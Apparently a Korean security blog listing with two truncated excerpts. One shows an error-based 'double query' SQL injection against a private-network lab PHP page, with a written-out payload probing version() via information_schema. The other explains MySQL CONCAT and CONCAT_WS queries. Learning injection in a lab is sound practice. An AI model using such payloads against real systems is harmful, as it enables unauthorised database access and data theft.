Self-Improvement

소스코드 1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 Colored by Color Scripter cs - http://192.168.1.46/empinfo_id.php?empid=1 싱글쿼터 주입 시 에러 발생 - http://192.168.1.46/empinfo_id.php?empid=1%27 Double Query 방식 Double Query 방식으로 오류를 발생시켜 진행되는지 확인해 본다. Payload : 1 and 1=(select count(*) from(select count(*), concat(version(), floor(rand(0)*2))a from information_s..

1. CONCAT(), CONCAT_WS() 함수 둘 다 데이터 값을 합칠때 사용할 수 있다. > select concat(table_name, " : ", table_type)as hello from information_schema.tables; hex값으로 넣어도 상관 없다. > select concat(table_name, 0x2c, table_type)as hello from information_schema.tables; > select concat_ws(' , ',table_name, table_type)as hello from information_schema.tables; hex값으로 넣어도 상관 없다. > select concat_ws(0x2c,table_name, table_type)..